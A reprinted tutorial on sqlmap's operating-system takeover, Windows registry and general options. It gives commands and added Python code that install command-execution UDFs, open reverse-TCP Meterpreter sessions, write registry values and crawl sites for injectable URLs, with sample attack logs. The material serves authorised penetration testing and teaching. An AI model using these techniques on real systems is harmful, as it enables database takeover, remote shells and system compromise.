Security Testing === sqlmap (iii) (reprint)

Source: Internet
Author: User

15. Operating system control

1. Execute arbitrary operating system commands

Parameters: --os-cmd and --os-shell

If the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current database user has the required privileges, sqlmap can use the SQL injection to execute arbitrary operating system commands on the database host.

When the DBMS is MySQL or PostgreSQL, sqlmap uploads a binary shared library containing the user-defined functions sys_exec() and sys_eval() with the file upload feature described earlier, creates the two functions in the database, and then runs the user's command through one of them. Which one is used depends on whether the user wants the standard output of the command: sys_eval() returns the output, sys_exec() returns only the exit status.

When the DBMS is Microsoft SQL Server, sqlmap executes commands through the xp_cmdshell stored procedure. If xp_cmdshell is disabled (it is disabled by default since SQL Server 2005) sqlmap enables it, and if it has been removed sqlmap recreates it.

When the user wants the standard output of the command, sqlmap retrieves it with one of the enumeration injection techniques (boolean-based blind, in-band or error-based); when the output is not wanted, the stacked-queries technique is used to run the command.
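The following is an added example, not sqlmap's own code, showing the MySQL side of the mechanism just described: the stacked queries that drop the UDF library into the plugin directory with SELECT ... INTO DUMPFILE and register sys_exec()/sys_eval() from it, the choice between the two functions depending on whether output is wanted, and the check a defender runs against mysql.func to spot such UDFs. The library bytes, the plugin directory, the library file name and the mysql.func rows are constructed for the demo.

```python
# Added example (not sqlmap's own code). Everything below is constructed:
# the library bytes, the plugin directory and the sample mysql.func rows.
from typing import Dict, List

# Return types the sys_* UDFs are declared with; MySQL never ships these.
SYS_UDFS = {
    "sys_exec": "INTEGER",    # runs a command, returns only its exit status
    "sys_eval": "STRING",     # runs a command, returns its standard output
    "sys_bineval": "INTEGER", # runs shellcode in memory (used by --os-pwn)
}


def udf_install_statements(plugin_dir: str, so_bytes: bytes,
                           lib_name: str = "lib_mysqludf_sys.so") -> List[str]:
    """Stacked queries that write the shared library into MySQL's plugin
    directory and register sys_exec()/sys_eval() from it.

    This needs the FILE privilege, a writable @@plugin_dir, and a
    secure_file_priv setting that does not forbid the destination; any of
    those missing is why sqlmap's --os-cmd can fail on a hardened server."""
    path = f"{plugin_dir.rstrip('/')}/{lib_name}"
    hex_blob = "0x" + so_bytes.hex()   # raw bytes survive as a hex literal
    stmts = [f"SELECT {hex_blob} INTO DUMPFILE '{path}'"]
    for name in ("sys_exec", "sys_eval"):
        stmts.append(
            f"CREATE FUNCTION {name} RETURNS {SYS_UDFS[name]} SONAME '{lib_name}'")
    return stmts


def os_cmd_query(command: str, want_output: bool) -> str:
    """Pick the UDF the way sqlmap's prompt does: sys_eval() when the
    operator wants stdout back, sys_exec() when only execution matters."""
    func = "sys_eval" if want_output else "sys_exec"
    escaped = command.replace("\\", "\\\\").replace("'", "\\'")
    return f"SELECT {func}('{escaped}')"


def suspicious_udfs(func_rows: List[Dict[str, str]]) -> List[str]:
    """Defender's check over rows of `SELECT name, dl FROM mysql.func`:
    any sys_* registration points at an attacker-installed library."""
    return [f"{r['name']} <- {r['dl']}" for r in func_rows if r["name"] in SYS_UDFS]


# Constructed sample rows, as a DBA would see them after a successful --os-cmd.
SAMPLE_FUNC_ROWS = [
    {"name": "sys_exec", "dl": "lib_mysqludf_sys.so"},
    {"name": "sys_eval", "dl": "lib_mysqludf_sys.so"},
    {"name": "my_checksum", "dl": "checksum.so"},
]

if __name__ == "__main__":
    for s in udf_install_statements("/usr/lib/mysql/plugin", b"\x7fELF"):
        print(s)
    print(os_cmd_query("id", want_output=True))
    print(suspicious_udfs(SAMPLE_FUNC_ROWS))
```

The cleanup sqlmap offers at the end of the run (DROP FUNCTION) removes the rows from mysql.func but, as its own warning says, the .so file written by INTO DUMPFILE stays on disk until someone deletes it.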

The following example targets PostgreSQL:

  python sqlmap.py -u "" --os-cmd id -v 1

Part of the output:

  web application technology: PHP 5.2.6, Apache 2.2.9
  back-end DBMS: PostgreSQL
  [hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
  [hh:mm:12] [INFO] the back-end DBMS operating system is Linux
  [hh:mm:12] [INFO] testing if current user is DBA
  [hh:mm:12] [INFO] detecting back-end DBMS version from its banner
  [hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
  [hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
  [hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
  [hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
  do you want to retrieve the command standard output? [Y/n/a] y
  command standard output: 'uid=104(postgres) gid=106(postgres) groups=106(postgres)'
  [hh:mm:19] [INFO] cleaning up the database management system
  do you want to remove UDF 'sys_eval'? [Y/n] y
  do you want to remove UDF 'sys_exec'? [Y/n] y
  [hh:mm:23] [INFO] database management system cleanup finished
  [hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually

The parameter --os-shell simulates a shell in which arbitrary commands can be executed; like --sql-shell it supports TAB completion and command history.

When stacked queries are not supported (for example PHP or ASP with a MySQL back end) but the DBMS is MySQL, it is still possible to write a web backdoor with a SELECT ... INTO OUTFILE clause into a writable directory under the web server's document root and then execute commands through that backdoor. sqlmap supports this technique and asks the user for a comma-separated list of directories that may be writable. The following server-side languages are supported for the backdoor:

    • ASP
    • ASP.NET
    • JSP
    • PHP

2. Out-of-band TCP connection: Meterpreter and related

Parameters: --os-pwn, --os-smbrelay, --os-bof, --priv-esc, --msf-path and --tmp-path

If the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current database user has the required privileges, sqlmap can establish an out-of-band TCP connection between the attacker's host and the database host. Depending on the user's choice this connection can be an interactive command shell, a Meterpreter session or a graphical user interface (VNC) session.

sqlmap relies on Metasploit to generate the shellcode and has four techniques to execute it on the database host:

    • Execute the Metasploit shellcode in memory through the user-defined function sys_bineval() created by sqlmap. Supported on MySQL and PostgreSQL. Parameter: --os-pwn.
    • Upload and execute a Metasploit stand-alone payload stager through sqlmap's own user-defined functions (sys_exec() on MySQL and PostgreSQL, xp_cmdshell() on Microsoft SQL Server). Parameter: --os-pwn.
    • Exploit the Microsoft Windows SMB relay vulnerability (MS08-068). The attacker's machine runs Metasploit's smb_relay exploit and listens for the connection from the target. This requires running sqlmap as root on Linux/Unix, and the target DBMS must run on Windows with administrator privileges. Parameter: --os-smbrelay.
    • Exploit the heap-based buffer overflow in the sp_replwritetovarbin stored procedure of Microsoft SQL Server 2000 and 2005 (MS09-004) to execute Metasploit shellcode in memory. sqlmap has its own exploit with a Data Execution Prevention (DEP) bypass, but still relies on Metasploit to generate the shellcode that runs once the vulnerability is triggered. Parameter: --os-bof.

The following example targets MySQL:

  python sqlmap.py -u "" --os-pwn --msf-path /software/metasploit

Part of the output:

  [...]
  [hh:mm:31] [INFO] the back-end DBMS is MySQL
  web server operating system: Windows 2003
  web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
  back-end DBMS: MySQL 5.0
  [hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
  [hh:mm:31] [INFO] the back-end DBMS operating system is Windows
  how do you want to establish the tunnel?
  [1] TCP: Metasploit Framework (default)
  [2] ICMP: icmpsh - ICMP tunneling
  >
  [hh:mm:32] [INFO] testing if current user is DBA
  [hh:mm:32] [INFO] fetching current user
  what is the back-end database management system architecture?
  [1] 32-bit (default)
  [2] 64-bit
  >
  [hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
  [hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
  [hh:mm:33] [INFO] detecting back-end DBMS version from its banner
  [hh:mm:33] [INFO] retrieving MySQL base directory absolute path
  [hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
  [hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
  how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
  [1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
  [2] Stand-alone payload stager (file system way)
  >
  [hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
  which connection type do you want to use?
  [1] Reverse TCP: Connect back from the database host to this machine (default)
  [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
  [3] Bind TCP: Listen on the database host for a connection
  >
  which is the local address? []
  which local port number do you want to use? [60641]
  which payload do you want to use?
  [1] Meterpreter (default)
  [2] Shell
  [3] VNC
  >
  [hh:mm:40] [INFO] creation in progress ... done
  [hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..

                  =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
  + -- --=[ 674 exploits - 351 auxiliary
  + -- --=[ 217 payloads - 27 encoders - 8 nops
        =[ svn r12272 updated 4 days ago (2011.04.07)

  PAYLOAD => windows/meterpreter/reverse_tcp
  EXITFUNC => thread
  LPORT => 60641
  LHOST =>
  [*] Started reverse handler on
  [*] Starting the payload handler...
  [hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
  [*] Sending stage (749056 bytes) to
  [*] Meterpreter session 1 opened ( :1689) at Mon Apr hh:mm:52 +0100 2011

  meterpreter > Loading extension espia...success.
  meterpreter > Loading extension incognito...success.
  meterpreter > [-] The 'priv' extension has already been loaded.
  meterpreter > Loading extension sniffer...success.
  meterpreter > System Language : en_US
  OS              : Windows .NET Server (Build 3790, Service Pack 2).
  Computer        : W2K3R2
  Architecture    : x86
  Meterpreter     : x86/win32
  meterpreter > Server username: NT AUTHORITY\SYSTEM
  meterpreter > ipconfig

  MS TCP Loopback interface
  Hardware MAC: 00:00:00:00:00:00
  IP Address  :

  Intel(R) PRO/1000 MT Network Connection
  Hardware MAC: 00:0c:29:fc:79:39
  IP Address  :

  meterpreter > exit
  [*] Meterpreter session 1 closed.  Reason: User exit

On Windows, MySQL runs as SYSTEM by default, whereas PostgreSQL runs as the low-privileged user postgres on both Windows and Linux. SQL Server 2000 runs as SYSTEM by default, but SQL Server 2005 to 2008 usually runs as NETWORK SERVICE and occasionally as LOCAL SERVICE.

Use the parameter --priv-esc to run Meterpreter's getsystem command and attempt to elevate privileges.

16. Windows Registry Operations

The Windows registry can be manipulated when all of the following hold:

    • The target DBMS runs on Windows
    • The target DBMS is MySQL, PostgreSQL or Microsoft SQL Server
    • Stacked queries are supported
    • The current database user has sufficient privileges

1. Read a Windows registry value

Parameter: --reg-read

2. Write a Windows registry value

Parameter: --reg-add

3. Delete a Windows registry value

Parameter: --reg-del
4. Auxiliary

Parameters: --reg-key, --reg-value, --reg-data and --reg-type

Used together, these parameters let you add or modify a Windows registry value from the command line without answering sqlmap's interactive prompts while it runs.

    • --reg-key: the path of the registry key (hive plus subkey)
    • --reg-value: the name of the value inside that key
    • --reg-data: the data to store in the value
    • --reg-type: the data type of the value (for example REG_SZ or REG_DWORD)

Example:

  python sqlmap.py -u "" --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
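As an added example (not sqlmap's own code), the helpers below take the same --reg-key/--reg-value/--reg-type/--reg-data inputs as the command above and express the read, add and delete operations two ways: directly as calls to SQL Server's xp_regread/xp_regwrite/xp_regdeletevalue extended stored procedures (which is why stacked queries are a precondition), and as a reg.exe command line that could be run through the command-execution channel of section 15 on any of the three DBMSes. Which of these sqlmap uses internally is not described on this page; the hive list, the accepted value types and the sample key are assumptions of the example.

```python
# Added example (not sqlmap's own code). Hive names and accepted --reg-type
# values are the standard Windows ones; the sample key is constructed.
REG_TYPES = {"REG_SZ", "REG_EXPAND_SZ", "REG_MULTI_SZ",
             "REG_DWORD", "REG_QWORD", "REG_BINARY"}
HIVES = {"HKEY_LOCAL_MACHINE", "HKEY_CURRENT_USER", "HKEY_CLASSES_ROOT",
         "HKEY_USERS", "HKEY_CURRENT_CONFIG"}


def split_key(reg_key):
    """'HKEY_LOCAL_MACHINE\\SOFTWARE\\sqlmap' -> ('HKEY_LOCAL_MACHINE', 'SOFTWARE\\sqlmap')"""
    hive, _, subkey = reg_key.partition("\\")
    if hive.upper() not in HIVES or not subkey:
        raise ValueError(f"bad registry key: {reg_key!r}")
    return hive.upper(), subkey


def tsql_str(s):
    """T-SQL string literal; doubling quotes keeps the value inside the literal."""
    return "'" + s.replace("'", "''") + "'"


def mssql_reg_statement(action, reg_key, reg_value, reg_type=None, reg_data=None):
    """Direct xp_reg* call for action in ('read', 'add', 'del')."""
    hive, subkey = split_key(reg_key)
    args = [tsql_str(hive), tsql_str(subkey), tsql_str(reg_value)]
    if action == "read":
        return "EXEC master..xp_regread " + ", ".join(args)
    if action == "del":
        return "EXEC master..xp_regdeletevalue " + ", ".join(args)
    if action == "add":
        if reg_type not in REG_TYPES:
            raise ValueError(f"unsupported --reg-type: {reg_type!r}")
        if reg_type in ("REG_DWORD", "REG_QWORD"):
            data = str(int(reg_data))        # numeric value goes unquoted
        else:
            data = tsql_str(str(reg_data))
        args += [tsql_str(reg_type), data]
        return "EXEC master..xp_regwrite " + ", ".join(args)
    raise ValueError(f"unknown action: {action!r}")


def reg_exe_command(action, reg_key, reg_value, reg_type=None, reg_data=None):
    """Equivalent reg.exe command line, runnable via sys_exec()/xp_cmdshell."""
    hive, subkey = split_key(reg_key)
    key = f'"{hive}\\{subkey}"'
    if action == "read":
        return f'reg query {key} /v "{reg_value}"'
    if action == "del":
        return f'reg delete {key} /v "{reg_value}" /f'
    if action == "add":
        if reg_type not in REG_TYPES:
            raise ValueError(f"unsupported --reg-type: {reg_type!r}")
        return f'reg add {key} /v "{reg_value}" /t {reg_type} /d "{reg_data}" /f'
    raise ValueError(f"unknown action: {action!r}")


if __name__ == "__main__":
    key = "HKEY_LOCAL_MACHINE\\SOFTWARE\\sqlmap"   # the key from the page's example
    print(mssql_reg_statement("add", key, "Test", "REG_SZ", "1"))
    print(reg_exe_command("add", key, "Test", "REG_SZ", "1"))
    print(mssql_reg_statement("read", key, "Test"))
```

Note that xp_regwrite under HKEY_LOCAL_MACHINE only succeeds when the SQL Server service account can write there, which ties back to the service-account table in section 15: SYSTEM can, NETWORK SERVICE generally cannot.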

17. General options

1. Load a sqlmap session from a SQLite file

Parameter: -s

sqlmap automatically creates a persistent session file (SQLite) for each target, stored under a fixed output directory (for example ~/.sqlmap/output/), holding all the data needed to resume the session. Use this parameter to specify the SQLite file explicitly, for example when you want to keep the data of several targets in one file.

2. Log HTTP(S) traffic to a file

Parameter: -t

This parameter takes a file path; all HTTP(S) requests and responses are logged to that file in text form. Such a log is useful when debugging.

3. Non-interactive mode

Parameter: --batch

With this parameter sqlmap runs non-interactively: every prompt that would normally require user input is answered with its default value.

4. Set the character encoding

Parameter: --charset

To decode retrieved data correctly, sqlmap uses the information provided by the web server (such as the charset in the HTTP Content-Type header) or falls back on the third-party library chardet to detect the encoding heuristically.

The parameter --charset forces a specific encoding, for example --charset=GBK.

5. Crawl the target site starting from the target URL

Parameter: --crawl

sqlmap can crawl the target site starting from the target URL and collect URLs that may be injectable. The parameter takes the crawl depth, counted relative to the starting URL, and the crawl finishes only once every newly found link has been visited recursively. It is recommended to combine it with --delay.

The following example targets MySQL:

  python sqlmap.py -u "" --batch --crawl=3

Part of the output:

  [xx:xx:53] [INFO] starting crawler
  [xx:xx:53] [INFO] searching for links with depth 1
  [xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
  [xx:xx:53] [INFO] searching for links with depth 2
  [xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
  [xx:xx:00] [INFO] 42/56 links visited (75%)


Parameter: --crawl-exclude

This parameter takes a regular expression; any URL matching it is not crawled. For example, --crawl-exclude=logout skips every URL containing the string "logout", which keeps the crawler from terminating the session it is crawling with.
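As an added example (not sqlmap's own crawler), here is a minimal breadth-first crawler with the two controls just described: a depth limit relative to the start URL and an exclusion regex, restricted to the start URL's host, with URLs carrying a query string picked out as injection candidates. Fetching is simulated with the constructed SITE dictionary so the code runs offline; the host name and pages are assumptions of the example.

```python
# Added example (not sqlmap's code). SITE is a constructed sample site that
# stands in for HTTP fetches; every URL and page body in it is made up.
import re
from html.parser import HTMLParser
from urllib.parse import urldefrag, urljoin, urlsplit

SITE = {
    "http://example.test/": '<a href="/list.php?id=1">items</a> '
                            '<a href="/about.html">about</a> '
                            '<a href="http://other.test/x">external</a>',
    "http://example.test/list.php?id=1": '<a href="/item.php?id=7">item</a> '
                                         '<a href="/logout.php">logout</a>',
    "http://example.test/item.php?id=7": '<a href="/deep.php?p=1">deeper</a>',
    "http://example.test/deep.php?p=1": '<a href="/deeper.php?p=2">deeper still</a>',
    "http://example.test/about.html": "",
    "http://example.test/logout.php": '<a href="/">home</a>',
}


class LinkExtractor(HTMLParser):
    """Collects href attributes of <a> tags."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def fetch(url):
    """Simulated HTTP GET; a real crawler would honour --delay here."""
    return SITE.get(url, "")


def crawl(start, depth, exclude=None):
    """Breadth-first crawl limited to `depth` link hops from `start` and to
    start's host. URLs matching `exclude` are neither visited nor followed."""
    host = urlsplit(start).netloc
    excl = re.compile(exclude) if exclude else None
    seen, frontier = {start}, [start]
    for _ in range(depth):
        next_frontier = []
        for url in frontier:
            parser = LinkExtractor()
            parser.feed(fetch(url))
            for href in parser.links:
                target = urldefrag(urljoin(url, href)).url   # absolute, no #fragment
                if urlsplit(target).netloc != host or target in seen:
                    continue
                if excl and excl.search(target):
                    continue
                seen.add(target)
                next_frontier.append(target)
        frontier = next_frontier
    return seen


def injectable(urls):
    """The crawl results worth testing: URLs that carry GET parameters."""
    return sorted(u for u in urls if urlsplit(u).query)


if __name__ == "__main__":
    found = crawl("http://example.test/", depth=2, exclude="logout")
    print(sorted(found))
    print(injectable(found))
```

With depth 2 the crawler stops at item.php and never reaches deep.php; without the exclusion it would also request logout.php, which on a real application would invalidate the session cookie used for the rest of the scan.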

6. Set the delimiter of the output CSV file

Parameter: --csv-del

When data is dumped to CSV (--dump-format=CSV) the fields are separated by "," by default; this parameter sets a different delimiter, for example --csv-del=";".

7. DBMS authentication credentials

Parameter: --dbms-cred

Sometimes an operation fails because the current database user has too few privileges. With this parameter you can supply the credentials of an administrative user (user:password); sqlmap then uses the DBMS-specific "run as" mechanism (for example OPENROWSET on Microsoft SQL Server) to re-execute the failed operation as that user. You do, of course, need to know those credentials.

8. Format of dumped data

Parameter: --dump-format

sqlmap has three output formats for enumerated data: CSV, HTML and SQLITE. CSV is the default: each table is written to its own text file, one record per line, fields separated by commas (or by the delimiter given with --csv-del). With HTML, all data goes into one HTML file as a table. With SQLITE, all data is written to one SQLite database whose table names and structure mirror the original tables.

9. Estimated time of completion

Parameter: --eta

This parameter displays the estimated time of completion. The following example is a boolean-based blind injection against Oracle:

  python sqlmap.py -u "" -b --eta

Part of the output:

  [hh:mm:01] [INFO] the back-end DBMS is Oracle
  [hh:mm:01] [INFO] fetching banner
  [hh:mm:01] [INFO] retrieving the length of query output
  [hh:mm:01] [INFO] retrieved: 64
  17% [========>                                           ] 11/64

and later:

  100% [===================================================] 64/64
  [hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release - Prod
  web application technology: PHP 5.2.6, Apache 2.2.9
  back-end DBMS: Oracle
  banner: 'Oracle Database 10g Enterprise Edition Release - Prod'

As shown, sqlmap first retrieves the length of the query output, then estimates the completion time, shows a percentage progress bar and counts the characters retrieved so far.

10. Flush the session file

Parameter: --flush-session

Use this parameter to flush the session file and avoid problems that sqlmap's default caching of results may cause. Only use it if you understand what the session file is; the alternative is to delete the session file manually.

11. Parse and test form input fields

Parameter: --forms

Besides testing form data supplied with -r or --data, you can use --forms to have sqlmap find the forms itself.

When --forms is used together with -u, sqlmap fetches the target URL given with -u, parses the forms on that page and tests their input fields for injection; the target URL itself is not tested.

12. Ignore the query results stored in the session file

Parameter: --fresh-queries

Use this parameter to ignore the query results cached in the session file so that the queries are executed again.

13. Use the DBMS hex function for retrieved data

Parameter: --hex

Non-ASCII data is easily corrupted in transit. With this parameter sqlmap has the DBMS return the retrieved data hex-encoded (using its hex function) and decodes it locally.

The following example targets PostgreSQL:

  python sqlmap.py -u "" --banner --hex -v 3 --parse-errors

Part of the output:

  [xx:xx:14] [INFO] fetching banner
  [xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
  [xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href=''></a>]: Query failed: ERROR: invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/</b> on line <b>35</b>'
  [xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2

14. Specify the output directory

Parameter: --output-dir

By default sqlmap writes session and result files to an output subdirectory; use this parameter to choose another directory, for example --output-dir=/tmp.

15. Parse DBMS error messages from the response

Parameter: --parse-errors

If the web application runs in debug mode, SQL error messages are likely to appear in the HTTP response. These messages help explain why an operation failed; for example, a failure caused by insufficient privileges produces a message like "Access denied for user".

The following example targets Microsoft SQL Server:

  python sqlmap.py -u "" --parse-errors

Part of the output:

  [xx:xx:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  [xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number is out of range of the number of items in the select list.<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
  [xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
  [xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
  [xx:xx:17] [INFO] target URL appears to have 3 columns in query

16. Specify the pivot column

Parameter: --pivot-column

Some DBMSes (Microsoft SQL Server, Sybase and SAP MaxDB among them) lack an OFFSET m,n style mechanism, so table records cannot be enumerated row by row directly. In that case sqlmap picks the most suitable pivot column (the one with the most unique values) and walks through its values, using each value to retrieve the other columns of that row.

If the automatic choice fails, specify the pivot column manually, for example --pivot-column=id.

17. Save the options to a configuration file

Parameter: --save

Use this parameter to save the sqlmap command-line options to a configuration file in INI format, which can be edited and loaded again with the parameter -c.

18. Update sqlmap

Parameter: --update

This parameter updates sqlmap and obviously requires Internet access. If it fails, run "git pull" in the sqlmap installation directory instead. On Windows, where the git command is usually not available, a Git client such as SmartGit can be used.

In fact --update and "git pull" update sqlmap the same way: both fetch the latest source code from the Git repository.

It is strongly recommended to update sqlmap before reporting a bug.
